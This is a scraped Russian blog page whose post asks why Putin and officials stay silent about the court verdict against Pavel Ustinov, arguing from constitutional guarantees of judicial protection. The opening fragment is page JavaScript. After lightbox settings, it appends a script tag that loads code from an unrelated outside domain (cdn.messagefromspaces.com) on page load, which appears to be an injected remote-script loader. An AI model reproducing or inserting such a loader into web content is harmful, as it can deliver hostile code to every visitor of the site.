, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Почему молчит Путин?

18 Сен

Конституция России устанавливает, что каждому гарантируется судебная защита его прав и свобод от решений и действий (или бездействия) органов  государственной власти и должностных лиц.

Казалось, что несогласные с приговором Павлу Устинову, именно этого будут требовать от тех, кто осуществлял и осуществляет его защиту. Именно они  должны поведать общественности, что судья сделал не так.  Но этого не происходит.

Полномочные представители по правам человека отмалчиваются, а от иных лиц, включая вновь вышедшую замуж Ксению Собчак, и до депутата Государственной Думы Сергея Шаргунова, ведутся дилетантские рассуждения о непричастности Устинова к тем деяниям, за которые ему суд назначил  больше трёшечки.

Казалось в такой ситуации, формирующий состав исполнителей судебной власти Владимир Путин не должен отмалчиваться. Он же гарант Конституции, и по действующему законодательству вправе обратиться в Квалификационную коллегию судей, если имело место неподчинение судьи требованиям Конституции России.

В Администрации Президента России есть целое правовое управление, которое, при возникших обстоятельствах,  обязано разъяснить правомерность принятого судом решения и справедливость наказания в 3 года и 6 месяцев.

Избранным осуществлять государственную власть и их назначенцам есть, что сказать по делу Павла Устинова.

Это тот случай, когда россияне и  мировая общественность могут убедиться в наличии или отсутствии в стране правосудия, как вида государственной деятельности, осуществляемой с соблюдением особого порядка, закреплённого Конституцией и процессуальным законодательством.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.